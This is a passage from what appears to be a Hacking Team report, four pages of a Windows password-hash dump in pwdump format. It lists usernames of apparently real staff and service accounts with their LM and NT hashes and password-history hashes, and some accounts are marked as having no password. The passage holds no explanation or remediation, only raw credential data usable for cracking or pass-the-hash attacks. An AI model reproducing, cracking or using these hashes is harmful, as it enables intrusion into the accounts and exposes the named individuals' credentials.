GAlessandro_history_7:1341:BD5E6B27AED739A03AEE7A4B10BF61F9:CEAE4FE5EE37EA51FD13F6305D9EDA4A:::
GAlessandro_history_8:1341:A542B74F848AFBD670F5F09B6C2B1FD3:EE9542F30647442C7DA38BCC5917AD5B:::
GAlessandro_history_9:1341:0450F83D998BE7ABF204FEAE65EC9D1D:005FC3318429892E5E3F7F12227EC50B:::
GAlessandro_history_10:1341:E4EF9C71B42DA9ECCCF9155E3E7DB453:B3E263DC29FC3BCA6E75B73D329F5737:::
ASantangelo:1350:B48FAD081D1EC0F9382A5EF502CE946B:81E2E86826AC4080CE595A89267DA234:::
ASantangelo_history_0:1350:11F53B0E3D180C87CD92DE3673ED2CDA:F7505D4EA25BB96CA9D7BDDE77A2E7B7:::
ASantangelo_history_1:1350:E69584B153E129F05A4E11F0E893EB93:02F2BF8921B542AF64D421A64D577D1C:::
ASantangelo_history_2:1350:07DC47022CDCBC63CD92DE3673ED2CDA:541752B921975E8E1714186C1E226965:::
ASantangelo_history_3:1350:F11F093FC0B245C0695109AB020E401C:A8253E7B6CE516D489C8EFC5BAABE599:::
ASantangelo_history_4:1350:407B37BA29FDBFE4C2265B23734E0DAC:02C23DAD64FC0856B039A0DF3ACB07B5:::
ASantangelo_history_5:1350:40F75A7A7F7C9F6AC2265B23734E0DAC:575CEFB3B8D9DFCBE312FD22240CAAE1:::
ASantangelo_history_6:1350:AD28771C93637C7F0B3F10CF05ECE188:0BA2FE3835E445CF66A514B6CA8F338F:::
ASantangelo_history_7:1350:E974D024728094980B3F10CF05ECE188:1FE4546B835B88710CA8F86135601FAB:::
ASantangelo_history_8:1350:07DC47022CDCBC6365C4A55F32B3BF85:BB6BEDCF3167A2CBED63BDCFC4A1E6E5:::
ASantangelo_history_9:1350:E69584B153E129F00C240E84A183686E:4A5805982EFF130FD02C6198B62A76C5:::
ASantangelo_history_10:1350:B38CDC06CEE996C6EC44577791D1BB4F:76967B05BB0827396BCCB99AA34DE01C:::
ABernazzoli:1353:0E28D9DF3FCB0630AB44663578112955:CE4B98CC43877584FFC041B6C2A0EBD2:::
ABernazzoli_history_0:1353:0E28D9DF3FCB0630AAF966491077C1C0:64E20D8CE50C72515385E2EADE51C4E7:::
ABernazzoli_history_1:1353:BBC1AFCE0CA1E5EECEAAF59F8FA06189:A821CB39BBFA974A5E0EEB9BB0A79A66:::
ABernazzoli_history_2:1353:BBC1AFCE0CA1E5EE713A337362D1620E:CB9E7B71EE2523C72F5D01C8B1918D51:::
ABernazzoli_history_3:1353:BBC1AFCE0CA1E5EEC2656717B661F069:AE9AAFC3E13A76C8A20CBDB8CEF5EBD2:::
ABernazzoli_history_4:1353:BBC1AFCE0CA1E5EE8F5C98085677F27F:799A6D448C62A0EB32B02666702E9C74:::
ABernazzoli_history_5:1353:BBC1AFCE0CA1E5EE6FD11BE51210BB1C:9AEC578E13D9137B2350B6A5196666D3:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 416 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
ABernazzoli_history_6:1353:BBC1AFCE0CA1E5EE6847331FACBE9799:573DF3461A91786517349D0DCC10C3AB:::
ABernazzoli_history_7:1353:BBC1AFCE0CA1E5EE4A4034D38DB0D895:A1B6CF5B78B827E791AE761AFB1FA64E:::
ABernazzoli_history_8:1353:BBC1AFCE0CA1E5EEAB44663578112955:98D7DC192A8606174BDD669E879D7462:::
ABernazzoli_history_9:1353:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
ABarrera:1359:1DB63F6EC28641BEBF63EAADE57A530B:1569520209464318F558A0446CAAF2A0:::
ABarrera_history_0:1359:4C62B0268887446D923DACF8022B36D6:A4097943CB89D6D6FFE1B82E7DB23E16:::
ABarrera_history_1:1359:CC3FEF276A2C15BB36077A718CCDF409:1CEA7B406FBE05EF415351E81E4D9405:::
ABarrera_history_2:1359:F6EC3706FDAC6CEA26510D9C70A91CD5:9D3735F136C47EA77BE6D7BB5875DEF9:::
ABarrera_history_3:1359:4064618394A52F6B36077A718CCDF409:62A152003238D009DE66399EBC74A8AC:::
ABarrera_history_4:1359:4C62B0268887446DFE8BD3C8869CCD10:1EE18AD0D75215227A89DB6F293CC818:::
ABarrera_history_5:1359:1D588B711A837777160C03353E2CD0CF:566EE836608FA2AB2600341B82CB76E2:::
ABarrera_history_6:1359:0DA1640A5C1E0CB352C5F40205369F45:988D26EB55613F929BA840D415D3C860:::
ABarrera_history_7:1359:298E783C833C9843D59DF58CE99281DB:7B9E118FC9D70685DA0669542A3B0276:::
ABarrera_history_8:1359:364783282E137386DCACF9FA43A994CF:EF98B4510786D9601CCEB54082610334:::
ABarrera_history_9:1359:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
CBourdillon:1365:6EB4791FFCC4622700A7AF7AC715311E:0D5090EF177388BB4816A855A0898BEB:::
CBourdillon_history_0:1365:DCBD2627566AAD127A01665EB2EB6C14:F8E0998200670583D5A5D51ACEBBE42B:::
CBourdillon_history_1:1365:6EB4791FFCC4622718FCD526FB48A829:28A7F6394FA647310A25C1D08675E96D:::
CBourdillon_history_2:1365:6EB4791FFCC46227B14FD58A657A9CA6:DAFE63C4525353156857B030278793D0:::
CBourdillon_history_3:1365:6EB4791FFCC462276FB9A7EF37043CD6:8ABADAA179DF6F26ECE4D982F07E4590:::
CBourdillon_history_4:1365:3C38F503FCC28EEEBA069C0F01D5831B:72AAB34D0490BD6057893177D779D520:::
CBourdillon_history_5:1365:6EB4791FFCC462279C5014AE4718A7EE:24067AC627843EEF12FABF9CC797F382:::
CBourdillon_history_6:1365:8CC0D0EEBD3AE2EA7C00CF191F9EDF0D:767B08DA06FB132C762BB1B12103C037:::
CBourdillon_history_7:1365:6EB4791FFCC46227504428E203455524:712F763F3D84DE63B1441EAC3075DAA6:::
CBourdillon_history_8:1365:6EB4791FFCC46227E90E512583CB4824:0D1E7FF5ED3390AC8E4CE5E4E74525D6:::
CBourdillon_history_9:1365:6EB4791FFCC4622795B909E7668E47E6:3F000CC35BC2271A30140683A194348A:::
CBourdillon_history_10:1365:6EB4791FFCC4622773251AA2B4314B90:6D4407EC43F324FE4D7957501BB0D29E:::
driga:1367:B912FF959E7F8C206CBED58B18AFD498:3445217E047F1533F2A182AF438B52D9:::
driga_history_0:1367:3DB9092BB47903EB31A60ABC6B5DA940:AE6E074BF8064FF56396E5A0AF98473D:::
driga_history_1:1367:3DB9092BB47903EB59A3DE4660A63543:46A9F523198CE16D341881C99FDFAC3F:::
driga_history_2:1367:3733F0C296FD85D8C81667E9D738C5D9:45C96A32CBCEE7A21C3CE5FA8D263827:::
driga_history_3:1367:3733F0C296FD85D8C2265B23734E0DAC:0BF75249331B60BB3C0712E0D42EEAFD:::
driga_history_4:1367:E0DB822993AA6350FF17365FAF1FFE89:E011E715BA01CC26FDF8CF2C6273CFA2:::
driga_history_5:1367:698F6A558E9D294F17D7CF00474E745A:11471610E652A4B838DA74BA89548AFB:::
driga_history_6:1367:B5E7D8E5F4E2E5F5C81667E9D738C5D9:A79043D19FBABF5A68A234FD149F56CF:::
driga_history_7:1367:536FD13794FA0D17AE7DFD7E9D38EB56:CD6D0423503596C4C4B6651B1916A907:::
driga_history_8:1367:C23413A8A1E7665FB3A23F4730883E44:330E4507FC5E4D22717B11E6AD3BC9FF:::
smeziane:1374:NO PASSWORD*********************:NO PASSWORD*********************:::
BdI-PGugliotta:1389:9DCF876128846F122EC9C2F30780876E:5F4CD7716B17994A3B016D3147D21465:::
BdI-PGugliotta_history_0:1389:C53EA2C2DFAD4CDA743C544636BCAF48:7E0F8F5F39223A11F349C90640E2583D:::
BdI-PGugliotta_history_1:1389:80903E410AA8CAC8F6232B14EA373065:2B194BFF3B8EB0CB3B6D9C4E0DF2FA4A:::
BdI-PGugliotta_history_2:1389:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
BdI-RStaiano:1390:4A2F0F8F23BA15A0C2265B23734E0DAC:475C4E1D5CCE861F0C02D516D877F67F:::
BdI-RStaiano_history_0:1390:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-RStaiano_history_1:1390:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
BdI-GRumolo:1391:36A21FD65D57AF366FB9A7EF37043CD6:CB2A732B489B44F14123D5092E774058:::
BdI-GRumolo_history_0:1391:B712BC5FA13EC3E6C81667E9D738C5D9:40863C69C2E2EF8ED9C233D9C7B95140:::
BdI-GRumolo_history_1:1391:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-GRumolo_history_2:1391:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
BdI-FCinti:1392:9478A4E5F48631FF09752A3293831D17:BC5B5BCF86BC29C832926C507A8DB1BA:::
BdI-FCinti_history_0:1392:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-FCinti_history_1:1392:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
BdI-GBoccuzzi:1393:E974D02472809498AF1B067E77CEC994:10043AA1EFE281A5A891C8CCF026F9BE:::
BdI-GBoccuzzi_history_0:1393:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-GBoccuzzi_history_1:1393:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-GBoccuzzi_history_2:1393:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 417 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
BdI-GBoccuzzi_history_3:1393:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
BdI-RCommentucci:1394:EA9068F69AD593BC875E96E00500AC35:FBFA0BEEF3AB2874B2CE11284017460D:::
BdI-RCommentucci_history_0:1394:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-RCommentucci_history_1:1394:80903E410AA8CAC8F6232B14EA373065:D3C2989B380742A3D0AF102425F2492C:::
BdI-RCommentucci_history_2:1394:80903E410AA8CAC8F6232B14EA373065:2B194BFF3B8EB0CB3B6D9C4E0DF2FA4A:::
BdI-RCommentucci_history_3:1394:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
apassoni:1412:36F39670D5251819E93472D6F5D4E480:501CC25F9C7B5B4FB4281653DE99B8D2:::
apassoni_history_0:1412:21D84D70E4ED900895B909E7668E47E6:01F0FBDA3B9C5DA07862CBE5E616860F:::
apassoni_history_1:1412:D91F5A57191BC6BB944E2DF489A880E4:80F5D87691F327E0079B1BD3F10AE90A:::
apassoni_history_2:1412:F11BE6FC24D7F3FB7C00CF191F9EDF0D:DBD51C20C612C29D5AC5D1D474D3A28A:::
MRicciardi:1413:D8A275455838D9FF8E0D50928A618F2A:37641F18698EFEB584415BDAD8673886:::
MRicciardi_history_0:1413:E20257C8DF20521059A3DE4660A63543:3BD227ADCD0F6A20E9B2F206E6195ABD:::
MRicciardi_history_1:1413:C559953126DD6966C81667E9D738C5D9:ED1881949397E6D5A0E3432FBD1854F8:::
MRicciardi_history_2:1413:3F49381F8A31399618FCD526FB48A829:145EEC152DC1997405E161B0B6FF3055:::
MRicciardi_history_3:1413:3F49381F8A31399618FCD526FB48A829:145EEC152DC1997405E161B0B6FF3055:::
MLupo:1415:D46FFF4D38F2C89DFF17365FAF1FFE89:2B6A964334D753CF924DD6A6EEE86E04:::
MLupo_history_0:1415:D46FFF4D38F2C89D1AA818381E4E281B:738029DC0D9F454965C91CA690ED443C:::
MLupo_history_1:1415:D46FFF4D38F2C89D1D71060D896B7A46:05ACCEFB2FD11504CC2E87BBE4C2CFD1:::
MLupo_history_2:1415:D46FFF4D38F2C89DC2265B23734E0DAC:F30055DB9FEC289EAFC52B0E37CAA62E:::
MLupo_history_3:1415:C23413A8A1E7665F7C00CF191F9EDF0D:4F7C51E2811D0A1AC6D0E360EA8D767F:::
MLupo_history_4:1415:3F49381F8A31399618FCD526FB48A829:145EEC152DC1997405E161B0B6FF3055:::
MNovik:1417:B2170AD04B68CDBE1D71060D896B7A46:93AD1A58D066120B9F391FA375B0748F:::
MNovik_history_0:1417:B2170AD04B68CDBEC2265B23734E0DAC:1E29A03FC65713BD11DBA8AAF4CA0A8B:::
MNovik_history_1:1417:888389342D409E0B7A01665EB2EB6C14:B5F457D10903E52EDEC0BF446E765AE5:::
MNovik_history_2:1417:DCBD2627566AAD127A01665EB2EB6C14:F8E0998200670583D5A5D51ACEBBE42B:::
mts-ldadmin:1420:3E2396515D10EFF92E2A484216002545:1FDA1801C8EA5D6EA72E4A90A4F9AE8E:::
mts-ldadmin_history_0:1420:84DDCAB84D4E530B18FCD526FB48A829:D57F776A9515D41D9CD1352AEE43BD00:::
lmeneghesso_u:1426:2E0742B26A882A594F61A0F9EE9D5018:B11BC936C318F5619F21E5207CB52313:::
lmeneghesso:1604:NO PASSWORD*********************:ED7FFA4E2F474004AA4890FF4DCF5CD3:::
lmeneghesso_history_0:1604:BC9C29014A52F54549D8BD468426DD07:EB437D07E436486F121E2CD82F87A7FF:::
lmeneghesso_history_1:1604:NO PASSWORD*********************:D2120DFFEFDEED6D11558FD780EC985E:::
lmeneghesso_history_2:1604:NO PASSWORD*********************:778381EC8581F23993552BE7260CCDE3:::
lmeneghesso_history_3:1604:NO PASSWORD*********************:8D2DC8547D95A0D0A33DB767154AEEA4:::
lmeneghesso_history_4:1604:NO PASSWORD*********************:60715E4499A87254FD82B5376C03FAF9:::
lmeneghesso_history_5:1604:39A9A60BB04886AAD5F7B2B631EED920:38DB0ABCE95324BFF4E504EDBBA5C0B9:::
lmeneghesso_history_6:1604:NO PASSWORD*********************:0B07BF8504AB7D1E651DBDA764BC80B8:::
lmeneghesso_history_7:1604:NO PASSWORD*********************:C7D6ACCE2B58CB8F0349D506B615C9EB:::
lmeneghesso_history_8:1604:NO PASSWORD*********************:543392587E1ABD3D64626E388A83A8C3:::
lmeneghesso_history_9:1604:1C67226676F77DACB6D4D7BB192FA3B6:EF5826B071FA32D9BD92B20B1E0E68DD:::
lmeneghesso_history_10:1604:NO PASSWORD*********************:65C970503D205ECC256538B65701D1BB:::
sysmon:1610:FF310DF3D88CFC4CE256B6ED6C5450B5:DA17436050985F660F4C3E2B43D07CFA:::
sysmon_history_0:1610:F1E45CB440C6F222829B15382FE04C64:AFEC51E4CCF96ADAAF7F00979F8D8645:::
sysmon_history_1:1610:FF310DF3D88CFC4CE256B6ED6C5450B5:DA17436050985F660F4C3E2B43D07CFA:::
sysmon_history_2:1610:FF310DF3D88CFC4CE256B6ED6C5450B5:DA17436050985F660F4C3E2B43D07CFA:::
sysmon_history_3:1610:501138DEB408EBE5CBE7391D7F72F554:7D8A9F6197AAB9521559E45283125C47:::
sysmon_history_4:1610:501138DEB408EBE5CBE7391D7F72F554:7D8A9F6197AAB9521559E45283125C47:::
sysmon_history_5:1610:72C091F5AD18FD5C25AD3B83FA6627C7:BE5207A32CD9A551246DF665EEFD131F:::
sysmon_history_6:1610:72C091F5AD18FD5C25AD3B83FA6627C7:BE5207A32CD9A551246DF665EEFD131F:::
bloomberg:1611:88470411055D13A2877D8C5FF319F4AF:7BDE04375B2A32E80B4A0E4AC1DC10B3:::
bloomberg_history_0:1611:88470411055D13A2877D8C5FF319F4AF:7BDE04375B2A32E80B4A0E4AC1DC10B3:::
bvhelpdesk:1628:646EDB8D41EE7E46DB2294261F598B4C:3C2E1FB77CDDD4D561AAB1406F440FA9:::
bvhelpdesk_history_0:1628:A425D7809D6C3F2F06678B58D5E5E376:C7ED6809DB87D93755EB7E53F80633FA:::
bvhelpdesk_history_1:1628:11F53B0E3D180C877E51F0BF38BDE884:1CB89C66B94AA012B28FE743EEDECD89:::
bvhelpdesk_history_2:1628:DEEF23E621AC346BB9A01C577B96C568:6D1E75785C2E6F8ECD5044B64263EA7D:::
bvhelpdesk_history_3:1628:6ACB9E3CC5AAA2CC695109AB020E401C:2FE52846387B66F9DEB8D562DBF87C7C:::
bvhelpdesk_history_4:1628:9F4221BA4A4B9707695109AB020E401C:41E6C545F3C1E7E0FC5D7EC3E981FB3C:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 418 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bvhelpdesk_history_5:1628:4B40E0951CFCCADF985C37F1923EEF11:52947255B5E6AF2CCA7F6A66F457A3D3:::
bvhelpdesk_history_6:1628:2F4E8286F696D0BCFB6D151C60DBD95F:6356EE492DE1896E565CF64E240F7B17:::
bvhelpdesk_history_7:1628:1CD804704D4750B99A0F5D12D8F612D0:1069B993EF4B85A727F308D99C30E1C9:::
bvhelpdesk_history_8:1628:A9B6510B3772954A816DEBED21A001D4:DE4749CBBFE7AE833310641DD0F4DA35:::
bvhelpdesk_history_9:1628:127153042E2355CB25AD3B83FA6627C7:E67812461AC64F39428C1E7C90C2152E:::
bvhelpdesk_history_10:1628:B1A9A1301CD7AEA9F856A19C02970C84:B7EC34A3C149A62A1C96022CA720D415:::
AMigliaccio:1649:5905F27126155499AF1B067E77CEC994:0AC2B019BEECCCBE7784324C61A439A7:::
AMigliaccio_history_0:1649:F0DA0D3E56A1219D8A8ECCC5A1006821:EE3D83EF777FFFC800D690808EF48302:::
AMigliaccio_history_1:1649:03D29FB6B09A7C0A5186DB21888E8E6A:50EE6BEE1A5E93828FF8B4AE26113544:::
AMigliaccio_history_2:1649:9FB42A3203CDBC17BE5C79B9E1006584:B54567D0E8F9DD640A45A27E9995DB2F:::
AMigliaccio_history_3:1649:5905F27126155499D1C550C1222B73F1:DFA11147891039D0DC7FB1366DC5E7EF:::
AMigliaccio_history_4:1649:E0244B63E79F4184C2265B23734E0DAC:4829EDD4D91206FA3F141FB0C54449CE:::
AMigliaccio_history_5:1649:6D883B5D8749734809752A3293831D17:56D3FADBF931F4111653A2A6211D88FB:::
AMigliaccio_history_6:1649:E0244B63E79F418409752A3293831D17:02804E0302868C3BDACEBF331FB4DDBF:::
AMigliaccio_history_7:1649:6D883B5D874973487C3113B4A1A5E3A0:409F2D3CC4C214293D74EC22C69E3F64:::
AMigliaccio_history_8:1649:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
AMigliaccio_history_9:1649:BBC1AFCE0CA1E5EEAAF966491077C1C0:2E924D52BE604F86F1918CAF74188C56:::
GBordin:1660:EC65B3461A26D5BCC2265B23734E0DAC:9A9670812D1A98967FE2A209394C80BE:::
GBordin_history_0:1660:F0372D58264636BB1D71060D896B7A46:3703D449F69E3F960B9060FD3E01078B:::
GBordin_history_1:1660:F0372D58264636BBC2265B23734E0DAC:6D5B3844B8B9F18B1FA93B174C722091:::
GBordin_history_2:1660:C17155C546185F51C2265B23734E0DAC:476D7A23FF9EE5805DB159795BA7A7C8:::
GBordin_history_3:1660:A3774CECD59DE912C2265B23734E0DAC:88E6079F8BC00D3C979033303ABB334F:::
GBordin_history_4:1660:5038B0A833A4260DC2265B23734E0DAC:15F40886B01C2F98C55A01EC6285C928:::
GBordin_history_5:1660:097E090ACFC3638825AD3B83FA6627C7:38A89580DFFC373255E3760ECA651587:::
GBordin_history_6:1660:097E090ACFC363889C5014AE4718A7EE:7B0751E55D9FF1F9DF6055474801F2F9:::
GBordin_history_7:1660:097E090ACFC36388FF17365FAF1FFE89:FAD7F2A5A435C259AACA3EB420D4BE4C:::
GBordin_history_8:1660:097E090ACFC363881AA818381E4E281B:F20A0135C297906EE3154BD9213DC249:::
GBordin_history_9:1660:097E090ACFC363881D71060D896B7A46:83B80F2DC6678A7A17E92CBA1665451F:::
GBordin_history_10:1660:097E090ACFC36388C2265B23734E0DAC:1B656C0253396E67ED6B7CDF91413849:::
DBrizzi:1661:AEDF6DE2855AB704CCA11EF51AD1BA6B:D8276058022E8A862078D561552D4F16:::
DBrizzi_history_0:1661:B7F928EFC904C13DCCA11EF51AD1BA6B:FB384888AF4A6B70D4FA13254EEEC413:::
DBrizzi_history_1:1661:A9C918478C6E43737E51F0BF38BDE884:D5E27077DE262C67F8008A32BCAE52EE:::
DBrizzi_history_2:1661:93B8776368E65F26EF17E0117328F3E7:A619574E7B1DC19163AB22B6BC5EADF9:::
DBrizzi_history_3:1661:BA298ABA33A9E93BC81667E9D738C5D9:FEEB9036A43BB67018EC5F3406BFB5BF:::
DBrizzi_history_4:1661:4B40E0951CFCCADF985C37F1923EEF11:52947255B5E6AF2CCA7F6A66F457A3D3:::
DBrizzi_history_5:1661:93B8776368E65F260613D8BEE29A1430:3C281F3F50CABAF928789056BA9CB86E:::
DBrizzi_history_6:1661:FDA6A7C4BFE735067E51F0BF38BDE884:B85BE91412B31EF1F4F07EC8EA7C0E1B:::
DBrizzi_history_7:1661:28F1F009A51817F8CCA11EF51AD1BA6B:95F9D18EB9D8394B926AF9896CFE032B:::
DBrizzi_history_8:1661:4022EC8795AD55A8223187A83ABF3B18:D9BBA212698CCB3B4062F5FA89C20386:::
DBrizzi_history_9:1661:F5E2F6AD1ACA70A4CCA11EF51AD1BA6B:DBBC983CB043D5848B4FD0339521B31B:::
DBrizzi_history_10:1661:5CE00C15C86E070B7E51F0BF38BDE884:B0EFA5997B8128CAFCEA63A698D2F28B:::
MTSMarkets:1662:777A5A65F667B11C944E2DF489A880E4:9002AE3A7A58F5E0DC3FA897CABD9EA4:::
websense_ad:1671:E447EB77460B565C37CA30BE54139FD9:0972A66BFB643B856927593EEFC1BA7A:::
websense_ad_history_0:1671:E447EB77460B565C37CA30BE54139FD9:0972A66BFB643B856927593EEFC1BA7A:::
websense_ad_history_1:1671:67B5AA2AC4D2CCA4CDBCADEF2C4DAE85:3D953BD778D593CC42CE1AEA5AC9CC6F:::
websense_ad_history_2:1671:AA68B217B27B9DFFC187B8085FE1D9DF:DE25516DC16BBCEAD817825BFC0C7EE1:::
websense_ad_history_3:1671:3F49381F8A3139966FB9A7EF37043CD6:D068B9402270D6A5D382FAC950AD7ECB:::
websense_ad_history_4:1671:3F49381F8A3139966FB9A7EF37043CD6:D068B9402270D6A5D382FAC950AD7ECB:::
websense_ad_history_5:1671:NO PASSWORD*********************:21042AF9036C47AA559AC2997BD3EA26:::
websense_ad_history_6:1671:NO PASSWORD*********************:21042AF9036C47AA559AC2997BD3EA26:::
websense_ad_history_7:1671:NO PASSWORD*********************:21042AF9036C47AA559AC2997BD3EA26:::
BdI-PCarollo:1704:8ED565BB4FC92FB5281978736574E093:4839C9D8A4D3E31B764EAD4796555133:::
BdI-PCarollo_history_0:1704:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
BdI-PCarollo_history_1:1704:08BEFE6FEACDDBABB3A23F4730883E44:3C04A1BB7043E66FDE4EC037B7AE4102:::
DGiannetti:4612:24503280F88E55D2B14FD58A657A9CA6:B93B008DA6291D342C55C9D071348118:::
DGiannetti_history_0:4612:E8A8EAA848452F26C81667E9D738C5D9:C973070A22453AC6591C1B81DEB6A78F:::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 419 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
DGiannetti_history_1:4612:7102F3036656B94AF16715CB08586F7C:D8CF0C2EC277C5BABB946BF778DE5BC5:::
DGiannetti_history_2:4612:8363EFD874DCBD30DDD371850C1A2FD1:832F189C610E13A33B136DDD3465A07D:::
DGiannetti_history_3:4612:C512CBF86B23B06AB4AB916588D13ED2:00BA736FC8B9C9569B29358D45ADA709:::
DGiannetti_history_4:4612:NO PASSWORD*********************:596938C2562A16CE5A4F3848DDBFFA32:::
DGiannetti_history_5:4612:NO PASSWORD*********************:21A2F88BB10CD450AA14F2A95CDBA7CF:::
DGiannetti_history_6:4612:732917B5714323CCA8C10D8E3C9BAC9A:1F4E542BDCDDB8F83482A84DFE1DCAD6:::
DGiannetti_history_7:4612:NO PASSWORD*********************:17D7F87DC72DF5C013162FE181313BE9:::
DGiannetti_history_8:4612:667C9BC63953CC23AEBD4DE384C7EC43:03FAA0D05FE1CC1AEC14E3890904E809:::
DGiannetti_history_9:4612:667C9BC63953CC23B757BF5C0D87772F:6844D05A1202511A7DCFF384159B9989:::
DGiannetti_history_10:4612:ED94707F7A79AB8F1AA818381E4E281B:A091AE3DD2A70058A09275FCB20EE6A0:::
ERaponi:4617:05DADA06D4EBB9F02B999340D53ADC02:531D5DEB8908D1F4030693DAB0BB175A:::
ERaponi_history_0:4617:76588E20431E546A36077A718CCDF409:F9D2CEC3609174BE5A91BE40E21E26D7:::
ERaponi_history_1:4617:6D6605A91F79A2B336077A718CCDF409:B55CBF14BCADF67A5D27AFCC2F7E38D2:::
ERaponi_history_2:4617:193F620ACE1071FC36077A718CCDF409:133E02D7A4303391C25084895DFF3E0B:::
ERaponi_history_3:4617:6B7C81E512F44BAF2B999340D53ADC02:F15BB14AADEE5723B4F0FC994A43FA8D:::
ERaponi_history_4:4617:961EB38815A6F1A62B999340D53ADC02:FE46830EA073487F2E2710978D07CC89:::
ERaponi_history_5:4617:A0D248DBD4CA65CC36077A718CCDF409:9A86FB12BAE0CABA7571F0F6039DEBE9:::
ERaponi_history_6:4617:0E442BF28DA39E4836077A718CCDF409:B0F4D7C3208FAB3AA66E35694D5F6F91:::
ERaponi_history_7:4617:FEFF21C4585C4C7B52C5F40205369F45:E98DFB29CB94F0C4A2F919BEB0F6BAAC:::
ERaponi_history_8:4617:011F0407CC828A4A199AE08B394E4AD2:149DC1A49189BA06857F64722CF4419F:::
ERaponi_history_9:4617:DDF8715B651B0B0636077A718CCDF409:56B90BEC96A52CB693B6BFE3647D4C09:::
ERaponi_history_10:4617:7D09AA740B797C0A2B999340D53ADC02:602FDD42C7ADD015636D1326D18DDBA7:::
MTSWriter:4625:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE:::
MTSWriter_history_0:4625:2E0742B26A882A594F61A0F9EE9D5018:B11BC936C318F5619F21E5207CB52313:::
MTSWriter_history_1:4625:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE:::
GVaciago:6108:93B8776368E65F26C5F2FDBD4B32EA2B:C5E4E1D40E76A555A00168D71D790387:::
GVaciago_history_0:6108:93B8776368E65F2623E32E641F46E184:C1F608B172642692C14687395FFAD904:::
GVaciago_history_1:6108:33540C6EACE260AA0CC3EB564B0F9047:A8AB40DA4BDD96EA8B32EA5782F87274:::
GVaciago_history_2:6108:93B8776368E65F263EAA960EBBA1A634:F1A45F7DDD4265FB6C738199C473C848:::
GVaciago_history_3:6108:93B8776368E65F26FB0FC0C4A9CB3F5C:92D9FE6D5A92873A76CE919ED2EF1A08:::
GVaciago_history_4:6108:93B8776368E65F2661C42405BC24C44C:0E8CACE8D54C917B166D1F0A089FBCD3:::
GVaciago_history_5:6108:4984AD335FCDC5C0C2265B23734E0DAC:66D06200A1CD446D1613A51B8412205B:::
GVaciago_history_6:6108:4984AD335FCDC5C01D71060D896B7A46:A15B311E09E2C0E77BFA499ACBE3254B:::
GVaciago_history_7:6108:0D189D51806F3E951AA818381E4E281B:E9757C2B8618C2F3F4743E99796179A4:::
GVaciago_history_8:6108:0D189D51806F3E951D71060D896B7A46:46BCCDB4C00C05D34B85A98E831733E8:::
GVaciago_history_9:6108:0D189D51806F3E95C2265B23734E0DAC:F419D70EF771D88EF405EA5F1E3BE7B1:::
GVaciago_history_10:6108:367609D22010C2E3B14FD58A657A9CA6:83D3E388494AFE92B686B2DF2F2CD055:::
uyunis:6147:333CB006680FAF0A27BCBF149915A329:318FC4D181C864777F2C1B07596A5EA9:::
uyunis_history_0:6147:6F87CD328120CC55902139606B6D16B5:E0020C65FE9434681B467B5C9F955089:::
uyunis_history_1:6147:6F87CD328120CC557584248B8D2C9F9E:B6FA617217EB15E3EDC51A8E61089874:::
uyunis_history_2:6147:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
llammaing:6152:367609D22010C2E3C2265B23734E0DAC:FD4F52BDAABF33650155C25B43F30E25:::
nsharma:6154:E772E8BE09D278DD7A16B32FE52E97E2:550098B40938CCACBE50890B1B39DE22:::
nsharma_history_0:6154:E772E8BE09D278DDA0E020715AA119F5:B8D5498A78C14F8D6339CAE05F48A72E:::
nsharma_history_1:6154:E772E8BE09D278DD05F8903F4CEBBC38:23A4B85CFC783C4832A222B72886AE1A:::
nsharma_history_2:6154:E772E8BE09D278DDE9634125B2DB375A:70B08B8097F79727E1759B98932737E4:::
nsharma_history_3:6154:E772E8BE09D278DDA86AD648FC555A74:089B055328C3BE12715AFA3A2CAAE231:::
nsharma_history_4:6154:E772E8BE09D278DDFF2441EE7DDC21A5:DB68789491A8DBBCDA71E60B96ED62CD:::
